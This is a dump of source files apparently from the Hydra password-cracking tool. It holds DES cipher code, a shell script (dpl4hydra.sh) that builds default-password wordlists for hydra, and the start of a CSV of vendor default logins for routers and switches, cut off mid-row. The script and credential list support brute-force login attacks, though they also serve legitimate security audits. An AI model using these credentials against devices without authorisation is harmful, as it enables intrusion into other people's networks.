0x00002001L, 0x00000000L, 0x00802000L, 0x00802000L, 0x00802081L, 0x00000081L, 0x00000000L, 0x00800080L, 0x00800001L, 0x00000001L, 0x00002000L, 0x00800000L, 0x00802001L, 0x00000080L, 0x00800000L, 0x00002001L, 0x00002080L, 0x00800081L, 0x00000001L, 0x00002080L, 0x00800080L, 0x00002000L, 0x00802080L, 0x00802081L, 0x00000081L,\n 0x00800080L, 0x00800001L, 0x00802000L, 0x00802081L, 0x00000081L, 0x00000000L, 0x00000000L, 0x00802000L, 0x00002080L, 0x00800080L, 0x00800081L, 0x00000001L, 0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L, 0x00802081L, 0x00000081L, 0x00000001L, 0x00002000L, 0x00800001L, 0x00002001L, 0x00802080L, 0x00800081L, 0x00002001L, 0x00002080L, 0x00800000L, 0x00802001L, 0x00000080L, 0x00800000L, 0x00002000L, 0x00802080L};\n\nstatic unsigned long SP5[64] = {0x00000100L, 0x02080100L, 0x02080000L, 0x42000100L, 0x00080000L, 0x00000100L, 0x40000000L, 0x02080000L, 0x40080100L, 0x00080000L, 0x02000100L, 0x40080100L, 0x42000100L, 0x42080000L, 0x00080100L, 0x40000000L, 0x02000000L, 0x40080000L, 0x40080000L, 0x00000000L, 0x40000100L, 0x42080100L, 0x42080100L, 0x02000100L, 0x42080000L, 0x40000100L, 0x00000000L, 0x42000000L, 0x02080100L, 0x02000000L, 0x42000000L, 0x00080100L,\n 0x00080000L, 0x42000100L, 0x00000100L, 0x02000000L, 0x40000000L, 0x02080000L, 0x42000100L, 0x40080100L, 0x02000100L, 0x40000000L, 0x42080000L, 0x02080100L, 0x40080100L, 0x00000100L, 0x02000000L, 0x42080000L, 0x42080100L, 0x00080100L, 0x42000000L, 0x42080100L, 0x02080000L, 0x00000000L, 0x40080000L, 0x42000000L, 0x00080100L, 0x02000100L, 0x40000100L, 0x00080000L, 0x00000000L, 0x40080000L, 0x02080100L, 0x40000100L};\n\nstatic unsigned long SP6[64] = {0x20000010L, 0x20400000L, 0x00004000L, 0x20404010L, 0x20400000L, 0x00000010L, 0x20404010L, 0x00400000L, 0x20004000L, 0x00404010L, 0x00400000L, 0x20000010L, 0x00400010L, 0x20004000L, 0x20000000L, 0x00004010L, 0x00000000L, 0x00400010L, 0x20004010L, 0x00004000L, 0x00404000L, 0x20004010L, 0x00000010L, 0x20400010L, 0x20400010L, 0x00000000L, 0x00404010L, 0x20404000L, 0x00004010L, 0x00404000L, 0x20404000L, 0x20000000L,\n 0x20004000L, 0x00000010L, 0x20400010L, 0x00404000L, 0x20404010L, 0x00400000L, 0x00004010L, 0x20000010L, 0x00400000L, 0x20004000L, 0x20000000L, 0x00004010L, 0x20000010L, 0x20404010L, 0x00404000L, 0x20400000L, 0x00404010L, 0x20404000L, 0x00000000L, 0x20400010L, 0x00000010L, 0x00004000L, 0x20400000L, 0x00404010L, 0x00004000L, 0x00400010L, 0x20004010L, 0x00000000L, 0x20404000L, 0x20000000L, 0x00400010L, 0x20004010L};\n\nstatic unsigned long SP7[64] = {0x00200000L, 0x04200002L, 0x04000802L, 0x00000000L, 0x00000800L, 0x04000802L, 0x00200802L, 0x04200800L, 0x04200802L, 0x00200000L, 0x00000000L, 0x04000002L, 0x00000002L, 0x04000000L, 0x04200002L, 0x00000802L, 0x04000800L, 0x00200802L, 0x00200002L, 0x04000800L, 0x04000002L, 0x04200000L, 0x04200800L, 0x00200002L, 0x04200000L, 0x00000800L, 0x00000802L, 0x04200802L, 0x00200800L, 0x00000002L, 0x04000000L, 0x00200800L,\n 0x04000000L, 0x00200800L, 0x00200000L, 0x04000802L, 0x04000802L, 0x04200002L, 0x04200002L, 0x00000002L, 0x00200002L, 0x04000000L, 0x04000800L, 0x00200000L, 0x04200800L, 0x00000802L, 0x00200802L, 0x04200800L, 0x00000802L, 0x04000002L, 0x04200802L, 0x04200000L, 0x00200800L, 0x00000000L, 0x00000002L, 0x04200802L, 0x00000000L, 0x00200802L, 0x04200000L, 0x00000800L, 0x04000002L, 0x04000800L, 0x00000800L, 0x00200002L};\n\nstatic unsigned long SP8[64] = {0x10001040L, 0x00001000L, 0x00040000L, 0x10041040L, 0x10000000L, 0x10001040L, 0x00000040L, 0x10000000L, 0x00040040L, 0x10040000L, 0x10041040L, 0x00041000L, 0x10041000L, 0x00041040L, 0x00001000L, 0x00000040L, 0x10040000L, 0x10000040L, 0x10001000L, 0x00001040L, 0x00041000L, 0x00040040L, 0x10040040L, 0x10041000L, 0x00001040L, 0x00000000L, 0x00000000L, 0x10040040L, 0x10000040L, 0x10001000L, 0x00041040L, 0x00040000L,\n 0x00041040L, 0x00040000L, 0x10041000L, 0x00001000L, 0x00000040L, 0x10040040L, 0x00001000L, 0x00041040L, 0x10001000L, 0x00000040L, 0x10000040L, 0x10040000L, 0x10040040L, 0x10000000L, 0x00040000L, 0x10001040L, 0x00000000L, 0x10041040L, 0x00040040L, 0x10000040L, 0x10040000L, 0x10001000L, 0x10001040L, 0x00000000L, 0x10041040L, 0x00041000L, 0x00041000L, 0x00001040L, 0x00001040L, 0x00040040L, 0x10000000L, 0x10041000L};\n\nstatic void desfunc(block, keys) register unsigned long *block, *keys;\n{\n register unsigned long fval, work, right, leftt;\n register int32_t round;\n\n leftt = block[0];\n right = block[1];\n work = ((leftt >> 4) ^ right) & 0x0f0f0f0fL;\n right ^= work;\n leftt ^= (work << 4);\n work = ((leftt >> 16) ^ right) & 0x0000ffffL;\n right ^= work;\n leftt ^= (work << 16);\n work = ((right >> 2) ^ leftt) & 0x33333333L;\n leftt ^= work;\n right ^= (work << 2);\n work = ((right >> 8) ^ leftt) & 0x00ff00ffL;\n leftt ^= work;\n right ^= (work << 8);\n right = ((right << 1) | ((right >> 31) & 1L)) & 0xffffffffL;\n work = (leftt ^ right) & 0xaaaaaaaaL;\n leftt ^= work;\n right ^= work;\n leftt = ((leftt << 1) | ((leftt >> 31) & 1L)) & 0xffffffffL;\n\n for (round = 0; round < 8; round++) {\n work = (right << 28) | (right >> 4);\n work ^= *keys++;\n fval = SP7[work & 0x3fL];\n fval |= SP5[(work >> 8) & 0x3fL];\n fval |= SP3[(work >> 16) & 0x3fL];\n fval |= SP1[(work >> 24) & 0x3fL];\n work = right ^ *keys++;\n fval |= SP8[work & 0x3fL];\n fval |= SP6[(work >> 8) & 0x3fL];\n fval |= SP4[(work >> 16) & 0x3fL];\n fval |= SP2[(work >> 24) & 0x3fL];\n leftt ^= fval;\n work = (leftt << 28) | (leftt >> 4);\n work ^= *keys++;\n fval = SP7[work & 0x3fL];\n fval |= SP5[(work >> 8) & 0x3fL];\n fval |= SP3[(work >> 16) & 0x3fL];\n fval |= SP1[(work >> 24) & 0x3fL];\n work = leftt ^ *keys++;\n fval |= SP8[work & 0x3fL];\n fval |= SP6[(work >> 8) & 0x3fL];\n fval |= SP4[(work >> 16) & 0x3fL];\n fval |= SP2[(work >> 24) & 0x3fL];\n right ^= fval;\n }\n\n right = (right << 31) | (right >> 1);\n work = (leftt ^ right) & 0xaaaaaaaaL;\n leftt ^= work;\n right ^= work;\n leftt = (leftt << 31) | (leftt >> 1);\n work = ((leftt >> 8) ^ right) & 0x00ff00ffL;\n right ^= work;\n leftt ^= (work << 8);\n work = ((leftt >> 2) ^ right) & 0x33333333L;\n right ^= work;\n leftt ^= (work << 2);\n work = ((right >> 16) ^ leftt) & 0x0000ffffL;\n leftt ^= work;\n right ^= (work << 16);\n work = ((right >> 4) ^ leftt) & 0x0f0f0f0fL;\n leftt ^= work;\n right ^= (work << 4);\n *block++ = right;\n *block = leftt;\n return;\n}\n\n/* Validation sets:\n *\n * Single-length key, single-length plaintext -\n * Key\t : 0123 4567 89ab cdef\n * Plain : 0123 4567 89ab cde7\n * Cipher : c957 4425 6a5e d31d\n *\n * Double-length key, single-length plaintext -\n * Key\t : 0123 4567 89ab cdef fedc ba98 7654 3210\n * Plain : 0123 4567 89ab cde7\n * Cipher : 7f1d 0a77 826b 8aff\n *\n * Double-length key, double-length plaintext -\n * Key\t : 0123 4567 89ab cdef fedc ba98 7654 3210\n * Plain : 0123 4567 89ab cdef 0123 4567 89ab cdff\n * Cipher : 27a0 8440 406a df60 278f 47cf 42d6 15d7\n *\n * Triple-length key, single-length plaintext -\n * Key\t : 0123 4567 89ab cdef fedc ba98 7654 3210 89ab cdef 0123 4567\n * Plain : 0123 4567 89ab cde7\n * Cipher : de0b 7c06 ae5e 0ed5\n *\n * Triple-length key, double-length plaintext -\n * Key\t : 0123 4567 89ab cdef fedc ba98 7654 3210 89ab cdef 0123 4567\n * Plain : 0123 4567 89ab cdef 0123 4567 89ab cdff\n * Cipher : ad0d 1b30 ac17 cf07 0ed1 1c63 81e4 4de5\n *\n * d3des V5.0a rwo 9208.07 18:44 Graven Imagery\n **********************************************************************/\n" }, { "path": "d3des.h", "content": "#ifdef __sun\n#include \n#elif defined(__FreeBSD__) || defined(__IBMCPP__) || defined(_AIX)\n#include \n#else\n#include \n#endif\n\n/*\n * This is D3DES (V5.09) by Richard Outerbridge with the double and\n * triple-length support removed for use in VNC.\n *\n * These changes are:\n * Copyright (C) 1999 AT&T Laboratories Cambridge. All Rights Reserved.\n *\n * This software is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n */\n\n/* d3des.h -\n *\n *\tHeaders and defines for d3des.c\n *\tGraven Imagery, 1992.\n *\n * Copyright (c) 1988,1989,1990,1991,1992 by Richard Outerbridge\n *\t(GEnie : OUTER; CIS : [71755,204])\n */\n\n#define EN0 0 /* MODE == encrypt */\n#define DE1 1 /* MODE == decrypt */\n\nextern void deskey(unsigned char *, int32_t);\n\n/*\t\t hexkey[8] MODE\n * Sets the internal key register according to the hexadecimal\n * key contained in the 8 bytes of hexkey, according to the DES,\n * for encryption or decryption according to MODE.\n */\n\nextern void usekey(unsigned long *);\n\n/*\t\t cookedkey[32]\n * Loads the internal key register with the data in cookedkey.\n */\n\nextern void cpkey(unsigned long *);\n\n/*\t\t cookedkey[32]\n * Copies the contents of the internal key register into the storage\n * located at &cookedkey[0].\n */\n\nextern void des(unsigned char *, unsigned char *);\n\n/*\t\t from[8]\t to[8]\n * Encrypts/Decrypts (according to the key currently loaded in the\n * internal key register) one block of eight bytes at address 'from'\n * into the block at address 'to'. They can be the same.\n */\n\n/* d3des.h V5.09 rwo 9208.04 15:06 Graven Imagery\n ********************************************************************/\n" }, { "path": "dpl4hydra.sh", "content": "#!/bin/sh\n#\n# Name: dpl4hydra\n# Version: 0.9.9\n# Date: 2012-04-16\n# Author: Roland Kessler / Twitter: @rokessler\n# Synopsis: Generates a (d)efault (p)assword (l)ist as input for THC hydra.\n# Credits: Thanks to van Hauser for support and fixing portability issues.\n# \"The universe is an intelligence test.\" -Timothy Leary (R.I.P.)\n\nINSTALLDIR=/usr/local\nLOCATION=etc\n\nusage ()\n{\ncat </dev/null 2>&1 && FETCH=\"wget -q -O -\"\n which curl >/dev/null 2>&1 && FETCH=\"curl -s\"\n\n if [ -n \"$FETCH\" ]; then\n echo \"done.\"\n echo \"Using `echo $FETCH | cut -d ' ' -f 1` for downloading data.\"\n echo\n else\n echo\n echo \"ERROR: Cannot refresh the list without wget or curl. Aborting.\" >&2\n echo\n exit 1\n fi\n \n echo \"Trying to download list of vendors from\"\n echo \"${SITE}... \" | tr -d \"\\n\"\n $FETCH $SITE > $INDEXSITE 2>/dev/null || { echo; echo; echo \"ERROR: Downloading data to disk failed. Network down?\" >&2; echo; rm $INDEXSITE; exit 1; }\n echo \"done.\"\n echo\n \n cat $INDEXSITE | grep -i 'href=./passwd-' | sed 's/.*href=.\\/passwd-/\\/passwd-/' | sed 's/\".*//' > $SUBSITES\n rm $INDEXSITE\n \n if [ -r $FULLFILE ]; then\n echo \"Moving existing password list to ${OLDFILE}.\"\n echo\n mv $FULLFILE $OLDFILE || { echo \"ERROR: Moving file $FULLFILE failed. Please check.\" >&2; echo; exit 1; }\n fi\n \n for SUBSITE in `cat $SUBSITES`; do\n VENDOR=`echo $SUBSITE | sed 's/\\.htm*//' | sed 's/.*-//'`\n echo \"Downloading default passwords for ${VENDOR} ... \" | tr -d \"\\n\"\n $FETCH \"${SITE}${SUBSITE}\" | tr -d '\\n\\r' | sed 's//,/i' | sed 's/<\\/td>/,/g' | sed 's/<[a-z =/\":;-]*>//gi' | \\\n sed 's/[\\t ]*,[\\t ]*/,/g' | sed 's/&[a-z]*;//gi' | sed 's/(unknown)//gi' | sed 's/(none)//gi' | sed 's/,unknown,/,,/gi' | sed 's/,none,/,,/gi' > dpl4hydra_${VENDOR}.tmp\n\n cat dpl4hydra_${VENDOR}.tmp | awk -F, '{print\"'$VENDOR',\"$2\",\"$3\",\"$4\",\"$5\",\"$6\",\"$7\",\"$8\",\"$9}' >> $FULLFILE\n \n rm dpl4hydra_${VENDOR}.tmp\n echo \"done.\"\n done\n rm $SUBSITES\n \n if [ ! -r $LOCALFILE ]; then\n echo\n echo \"ERROR: Cannot access local file ${LOCALFILE}. Skipping.\" >&2\n echo\n else\n echo\n echo \"Merging download with ${LOCALFILE}... \" | tr -d \"\\n\"\n cat $LOCALFILE >> $FULLFILE || { echo; echo \"ERROR: Merging of $FULLFILE and $LOCALFILE failed. Please check.\" >&2; echo; exit 1; }\n echo \"done.\"\n fi\n \n echo \"Cleaning up and sorting ${FULLFILE}... \" | tr -d \"\\n\"\n cat $FULLFILE | sed 's/(null)//g' | sed 's/(Null)//g' | sed 's/(NULL)//g' | sed 's/(blank)//g' | sed 's/(Blank)//g' | sed 's/(BLANK)//g' | sed 's/(none)//g' | sed 's/(None)//g' | sed 's/(NONE)//g' | sed 's/none//g' | sed 's/n\\/a//g' | sed 's/<//g' | sed 's/ //g' | sort | uniq > $CLEANFILE\n mv $CLEANFILE $FULLFILE\n echo \"done.\"\n echo\n echo \"Refreshed (d)efault (p)assword (l)ist $FULLFILE\"\n echo \"was created with `wc -l $FULLFILE | awk '{ print $1 }'` entries.\"\n echo\n}\n\ngenerate ()\n{\n HYDRAFILE=`echo \"dpl4hydra_${BRAND}.lst\" | tr '/ =:@\\\\|;<>\"'\"'\" '_____________'`\n\n if [ ! -r $FULLFILE ]; then\n echo\n echo \"ERROR: Cannot access input file ${FULLFILE}\" >&2\n echo \" You can rebuild it with '`basename $0` refresh'.\" >&2\n echo\n echo \" Trying to use $LOCALFILE instead... \" | tr -d \"\\n\"\n if [ -r $LOCALFILE ]; then\n FULLFILE=$LOCALFILE\n echo \"done.\"\n else\n echo\n echo \"ERROR: Cannot access local file ${LOCALFILE}. Aborting.\" >&2\n echo\n exit 1\n fi\n fi\n\n cat $FULLFILE 2>/dev/null | grep -i \"$PATTERN\" | awk -F\",\" '{ print $5\":\"$6 }' | sed 's/^[ \\t]*//' | sed 's/[ \\t]*$//' | sort | uniq > $HYDRAFILE\n\n ENTRIES=`wc -l $HYDRAFILE | awk '{ print $1 }'`\n if [ \"$ENTRIES\" -eq 0 ]; then\n rm -f $HYDRAFILE\n echo\n echo \"ERROR: No matching entries found for $BRAND systems.\" >&2\n echo \" File $HYDRAFILE was not created.\" >&2\n echo\n exit 1\n else\n if [ \"$ENTRIES\" -eq 1 ]; then\n echo\n echo \"File $HYDRAFILE was created with one entry.\"\n echo\n else\n echo\n echo \"File $HYDRAFILE was created with $ENTRIES entries.\"\n echo\n fi\n fi\n}\n\nLC_ALL=C\nexport LC_ALL\nDPLPATH=\".\"\ntest -r \"$DPLPATH/dpl4hydra_full.csv\" || DPLPATH=\"$INSTALLDIR/$LOCATION\"\nFULLFILE=\"$DPLPATH/dpl4hydra_full.csv\"\nOLDFILE=\"$DPLPATH/dpl4hydra_full.old\"\nLOCALFILE=\"$DPLPATH/dpl4hydra_local.csv\"\nINDEXSITE=\"$DPLPATH/dpl4hydra_index.tmp\"\nSUBSITES=\"$DPLPATH/dpl4hydra_subs.tmp\"\nCLEANFILE=\"$DPLPATH/dpl4hydra_clean.tmp\"\nSITE=\"http://open-sez.me\"\n\ncase $# in\n\t0) usage\n\t exit 0;;\n\t1) OPT=`echo $1 | tr \"[A-Z]\" \"[a-z]\"`;;\n\t*) echo\n echo \"ERROR: Too many options.\" >&2\n usage\n exit 1;;\nesac\n\ncase \"$OPT\" in\n \"-h\" | \"help\" | \"-help\" | \"--help\") usage;;\n \"-r\" | \"refresh\" | \"-refresh\" | \"--refresh\") refresh;;\n \"-a\" | \"all\" | \"-all\" | \"--all\") PATTERN=\",\"\n BRAND=\"all\"\n generate;;\n *) PATTERN=\"${OPT}\"\n BRAND=\"$OPT\"\n generate;;\nesac\n" }, { "path": "dpl4hydra_full.csv", "content": "1net1,R-90,,,admin,1,Admin,,\n2wire,2071-A,All,gateway.2wire.net or 10.0.0.138,,,Admin,,\n2wire,2700HG B,4.25.19,http://192.168.1.254,,,,,\n2wire,2701HGV,All,,admin,,Admin,,\n2wire,2701HGV-W,All,http://10.0.0.138 or http://gateway.2wire.net or http://home,,(printed on the bottom of the device),Admin,,\n2wire,Wireless Routers (most models),,http,,Wireless,Admin,,\n2wire,Wireless Routers,,,http,,,,\n360systems,Image Server 2000,,,factory,factory,,,\n3bb,NT3BB-1PWN-124,,,admin,3bb,Admin,,\n3bb,NT3BB-4PWN,,,admin,3bb,Admin,,\n3com,,,,adm,,,,\n3com,,,,admin,synnet,,,\n3com,,,,manager,manager,,,\n3com,,,,monitor,monitor,,,\n3com,,,,read,synnet,,,\n3com,,,,root,letmein,,1.25,\n3com,,,,security,security,,,\n3com,,,,write,synnet,,,\n3com,3C16405,,,admin,,,,\n3com,3C16405,,Console,Administrator,,Admin,,\n3com,3C16405,,Multi,,,Admin,,\n3com,3C16405,,Multi,admin,,Admin,,\n3com,3C16406,,,admin,,,,\n3com,3C16406,,Multi,admin,,Admin,telnet or serial,\n3com,3C16450,,,admin,,,,\n3com,3C16450,,Multi,admin,,Admin,telnet or serial,\n3com,3CR414492,All,192.168.200.254,root,!root,Root,,\n3com,3CRADSL72 ,1.2,Multi,,1234admin,Admin,snmp open by default with public / private community,\n3com,3CRADSL72,1.2,Multi,,1234admin,Admin,snmp open by default with public / private community,\n3com,3CRWDR101A75,All,http://192.168.1.1,,admin,Admin,,\n3com,3CRWE52196,,,,admin,,,\n3com,3CRWE554G72,All,http://192.168.1.1,,admin,Admin,,\n3com,3Com SuperStack 3 Switch 3300XM,,,security,security,,,\n3com,3Com SuperStack 3 Switch 3300XM,,Admin,security,security,,,\n3com,3c16405,,,,,,,\n3com,3c16405,,,Administrator,,,,\n3com,812,,HTTP,Administrator,admin,Admin,,\n3com,AirConnect AP,,,,comcomcom,,,\n3com,AirConnect Access Point,,01.50-01,,,,,\n3com,AirConnect Access Point,,Admin,,,,,\n3com,AirConnect Access Point,,SNMP,,comcomcom,,,\n3com,AirConnect Access Point,01.50-01,Multi,,,Admin,,\n3com,Boson router simulator,3.66,HTTP,admin,admin,User,,\n3com,CB9000 / 4007,3,Console,Type User: FORCE,,Admin,This will recover a lost password and reset the switch config to Factory Default,\n3com,Cable Managment System SQL Database (DOCSIS DHCP),,,DOCSIS_APP,3com,,Win2000 MS,\n3com,Cable Managment System SQL Database (DOSCIC DHCP),,,DOCSIS_APP,3com,,Win2000 & MS,\n3com,CellPlex,,,admin,synnet,,,\n3com,CellPlex,,7000,,,,,\n3com,CellPlex,,7000,admin,admin,,,\n3com,CellPlex,,7000,root,,,,\n3com,CellPlex,,7000,tech,tech,,,\n3com,CellPlex,,Admin,admin,synnet,,,\n3com,CellPlex,,Admin,tech,tech,,,\n3com,CellPlex,,HTTP,admin,synnet,Admin,,\n3com,CellPlex,,Multi,,,Admin,,\n3com,CellPlex,,Multi,admin,admin,Admin,,\n3com,CellPlex,7000,Multi,admin,admin,Admin,RS-232/telnet,\n3com,CellPlex,7000,Telnet,admin,admin,Admin,,\n3com,CellPlex,7000,Telnet,operator,,Admin,,\n3com,CellPlex,7000,Telnet,root,,Admin,,\n3com,CellPlex,7000,Telnet,tech,,Admin,,\n3com,CellPlex,7000,Telnet,tech,tech,Admin,,\n3com,CoreBuilder 6000,,,debug,tech,,,\n3com,CoreBuilder,,,debug,synnet,,,\n3com,CoreBuilder,,,tech,tech,,,\n3com,CoreBuilder,,7000/6000/3500/2500,debug,synnet,,,\n3com,CoreBuilder,,7000/6000/3500/2500,tech,tech,,,\n3com,CoreBuilder,7000/6000/3500/2500,Telnet,,,Admin,,\n3com,CoreBuilder,7000/6000/3500/2500,Telnet,,admin,Admin,,\n3com,CoreBuilder,7000/6000/3500/2500,Telnet,debug,synnet,,,\n3com,CoreBuilder,7000/6000/3500/2500,Telnet,tech,tech,,,\n3com,HiPerACT,,v4.1.x,admin,,,,\n3com,HiPerARC,,Admin,adm,,,,\n3com,HiPerARC,,v4.1.x,adm,,,,\n3com,HiPerARC,v4.1.x,Telnet,adm,,,,\n3com,HiPerARC,v4.1.x,Telnet,adm,,Admin,,\n3com,HiPerARC,v4.1.x,Telnet,admin,,Admin,,\n3com,Home Connect,,,User,Password,,,\n3com,Internet Firewall,3C16770,HTTP,admin,password,Admin,,\n3com,LANplex,,,debug,synnet,,,\n3com,LANplex,,,tech,tech,,,\n3com,LANplex,,2500,debug,synnet,,,\n3com,LANplex,,2500,tech,,,,\n3com,LANplex,,Admin,tech,,,,\n3com,LANplex,2500,Telnet,debug,synnet,,,\n3com,LANplex,2500,Telnet,tech,,Admin,,\n3com,LANplex,2500,Telnet,tech,tech,,,\n3com,LANplex/Corebuilder line,multiple models,,debug,synnet,,,\n3com,LinkBuilder,,,,,,,\n3com,LinkBuilder,,Admin,,,,,\n3com,LinkBuilder,,Telnet,,,Admin,,\n3com,LinkSwitch and CellPlex,,,debug,synnet,,,\n3com,LinkSwitch and CellPlex,,,tech,tech,,,\n3com,LinkSwitch,,,tech,tech,,,\n3com,LinkSwitch,,2000/2700,tech,tech,,,\n3com,LinkSwitch,2000/2700,Telnet,tech,tech,,,\n3com,LinkSwitch,2700,,debug,synnet,,,\n3com,Linkbuilder 3500,,,administer,administer,,,\n3com,NAC (Network Access Card),,,adm,,,,\n3com,NBX100,,,administrator,0,,2.8,\n3com,NetBuilder,,,,ANYCOM,,,\n3com,NetBuilder,,,,admin,,,\n3com,NetBuilder,,SNMP,,ANYCOM,snmp-read,,\n3com,NetBuilder,,SNMP,,ILMI,snmp-read,,\n3com,NetBuilder,,SNMP,,admin,User,SNMP_READ,\n3com,NetBuilder,,User,,admin,,,\n3com,NetBuilder,,snmp-read,,ANYCOM,,,\n3com,NetBuilder,,snmp-read,,ILMI,,,\n3com,Netbuilder,,,Root,,,,\n3com,Netbuilder,,,admin,,,,\n3com,Netbuilder,,HTTP,Root,,Admin,http://10.1.0.1,\n3com,Netbuilder,,Multi,admin,,Admin,,\n3com,Office Connect ISDN Routers,,5x0,,PASSWORD,,,\n3com,Office Connect ISDN Routers,,Admin,,PASSWORD,,,\n3com,OfficeConnect 812 ADSL,,,adminttd,adminttd,,,\n3com,OfficeConnect 812 ADSL,,01.50-01,admin,,,,\n3com,OfficeConnect 812 ADSL,,Admin,admint|,admint|,,,\n3com,OfficeConnect 812 ADSL,,Multi,adminttd,adminttd,Admin,,\n3com,OfficeConnect 812 ADSL,01.50-01,Multi,admin,,Admin,,\n3com,OfficeConnect ADSL Wireless 11g Firewall Router,3CRWDR100-72,HTTP,,admin,Admin,http://192.168.1.1,\n3com,OfficeConnect ISDN Routers,5x0,Telnet,,PASSWORD,Admin,,\n3com,OfficeConnect Remote 812,,,root,!root,,,\n3com,OfficeConnect Remote 840,,,root,!root,,,\n3com,OfficeConnect Remote Router,,812 ADSL 840 SDSL,root,!root,,,\n3com,OfficeConnect Wireless 11g Cable/DSL Gateway,,,,admin,,,\n3com,OfficeConnect Wireless 11g Cable/DSL Gateway,,HTTP,,admin,Admin,,\n3com,OfficeConnect,,Multi,,,Admin,,\n3com,OfficeConnect,11g,Multi,admin,,User,,\n3com,Router,3000/5000 Series,Boot Prompt,,,Admin,,\n3com,SS III Switch,,4xxx (4900 - sure),recovery,recovery,,,\n3com,Shark Fin,Comcast-supplied,HTTP,User,Password,Diagnostics page,192.160.100.1,\n3com,SuperStack 2700,,,tech,tech,,,\n3com,SuperStack 3,,4400-49XX,manager,manager,,,\n3com,SuperStack 3,,4XXX,admin,,,,\n3com,SuperStack 3,,4XXX,monitor,monitor,,,\n3com,SuperStack II Dual Speed 500,,,security,security,,,\n3com,SuperStack II Netbuilder,11.1,Multi,,,Admin,,\n3com,SuperStack II Switch 1100,,,manager,manager,,,\n3com,SuperStack II Switch 1100,,,security,security,,,\n3com,SuperStack II Switch 3300,,,manager,manager,,,\n3com,SuperStack II Switch,,,debug,synnet,,,\n3com,SuperStack II Switch,,,manager,manager,,Any,\n3com,SuperStack II Switch,,,monitor,monitor,,Any,\n3com,SuperStack II Switch,,,tech,password,,Any,\n3com,SuperStack II Switch,,1100/3300,admin,,,,\n3com,SuperStack II Switch,,1100/3300,manager,manager,,,\n3com,SuperStack II Switch,,1100/3300,monitor,monitor,,,\n3com,SuperStack II Switch,,1100/3300,security,security,,,\n3com,SuperStack II Switch,,2200,debug,synnet,,,\n3com,SuperStack II Switch,,2700,tech,tech,,,\n3com,SuperStack II Switch,,Admin,tech,tech,,,\n3com,SuperStack II Switch,1100/3300,Console,3comcso,RIP000,initialize,resets all pws to defaults,\n3com,SuperStack II Switch,2200,Telnet,debug,synnet,,,\n3com,SuperStack II Switch,2700,Telnet,tech,tech,Admin,,\n3com,SuperStack II,,Console,,,Admin,,\n3com,SuperStack III Switch,3300XM,Multi,security,security,Admin,,\n3com,SuperStack III Switch,4400-49XX,Multi,manager,manager,User can access/change operational setting but not security settings,,\n3com,SuperStack III Switch,4XXX,Multi,admin,,Admin,,\n3com,SuperStack III Switch,4XXX,Multi,monitor,monitor,User,,\n3com,SuperStack III Switch,4xxx (4900 - sure),Telnet,recovery,recovery,resets_all_to_default,u need to power off unit. tbl_ ,\n3com,SuperStack III Switch,4xxx (4900 - sure),Telnet,recovery,recovery,resets_all_to_default,u need to power off unit. tbl_,\n3com,SuperStack III Switch,4xxx (4900 - sure),console,recover,recover,Admin,,\n3com,Superstack 3 switch,,4900,recover,recover,,,\n3com,Switch 3000/3300,,,Admin,3com,,,\n3com,Switch 3000/3300,,,admin,admin,,,\n3com,Switch 3000/3300,,,manager,manager,,,\n3com,Switch 3000/3300,,,monitor,monitor,,,\n3com,Switch 3000/3300,,,security,security,,,\n3com,Switch,,3300XM,admin,admin,,,\n3com,Switch,3300XM,Multi,admin,admin,Admin,,\n3com,US Robotics ADSL Router,,8550,,12345,,,\n3com,Wireless AP,,,,comcomcom,,,\n3com,Wireless AP,,ANY,admin,comcomcom,,,\n3com,Wireless AP,,Admin,admin,comcomcom,,,\n3com,Wireless AP,ANY,Multi,admin,comcomcom,Admin,Works on all 3com wireless APs,\n3com,boson router simulator,,User,admin,admin,,,\n3com,cellplex,,,,,,,\n3com,cellplex,,7000,operator,,,,\n3com,cellplex,,Admin,admin,admin,,,\n3com,corebuilder,,7000,operator,admin,,,\n3com,e960,,,Admin,Admin,,,\n3com,e960,3CRWDR100-72,Admin,Admin,Admin,HTTP,http://192.168.1.1,\n3com,hub,,,,,,,\n3com,hub,,Admin,,,,,\n3com,hub,,Multi,,,Admin,,\n3com,router,,,,,,,\n3com,router,,Admin,,,,,\n3com,super stack 2 switch,,,manager,manager,,,\n3com,super stack II,,,,,,,\n3com,super stack II,,Admin,,,,,\n3com,super,,,admin,,,,\n3com,superstack II,,1100/3300,3comcso,RIP000,,,\n3com,superstack II,,initialize,3comcso,RIP000,,,\n3go,3GO11,All,http://80.1.64.217,administrator,246810,Admin,,\n3m,VOL-0215 etc.,,,volition,volition,,,\n3m,VOL-0215 etc.,,Admin,volition,volition,,,\n3m,VOL-0215 etc.,,SNMP,volition,volition,Admin,Volition fiber switches,\n3m,Voliton,,,VOL-0215,,,,\n3m,Voliton,,,volition,volition,,,\n3ware,3DM,,HTTP,Administrator,3ware,Admin,,\nabocom,AP900,,192.168.1.240,,,Admin,,\nabocom,ARM904,,192.168.1.254,,,Admin,,\nabocom,ARM914,,192.168.1.1,admin,admin,Admin,,\nabocom,SWB500,,,,public,,,\nabocom,WAP253,,192.168.1.254,admin,,Admin,,\nabocom,WAP404,,192.168.1.252,,,Admin,,\nabocom,WP102,,192.168.100.252,,,Admin,,\nabocom,WR5201,,10.10.10.254,admin,admin,Admin,,\nabocom,WR5204,,192.168.1.254,admin,admin,Admin,,\nabocom,WR5207,,192.168.1.1,admin,password,Admin,,\nabocom,WR5560,,192.168.1.254,admin,password,Admin,,\nacc,Any router,,,netman,netman,,all,\nacc,Congo/Amazon/Tigris,,,netman,netman,,All versions,\nacc,Tigris Platform,All,Multi,public,,Guest,,\naccelerated networks,DSL CPE and DSLAM,,,sysadm,anicust,,,\nacceleratednetworks,DSL CPE and DSLAM,,Telnet,sysadm,anicust,,,\nacconet,Router,,,Admin,admin,Admin,,\naccton t_online,accton,,,,0,,,\naccton,CheetahChassis Workgroup Switch,3714,SNMP/HTTP/Telnet,admin,,,,\naccton,CheetahChassis Workgroup Switch,3714,SNMP/HTTP/Telnet,manager,manager,,,\naccton,CheetahChassis Workgroup Switch,3714,SNMP/HTTP/Telnet,monitor,monitor,,,\naccton,Gigabit Switches,,,__super,(caclulated),,,\naccton,MR3202A router,,192.168.1.1,root,,Admin,SSID is Wireless Network 1,\naccton,T-ONLINE,,aaaaaaa,,0,,,\naccton,Wireless Router,T-online,HTTP,,0,Admin,,\naccton,Wireless Router,T-online,HTTP,,0000,Admin,,\naccton,Wirelessrouter,,T-online,,0,,,\naceex,Modem ADSL 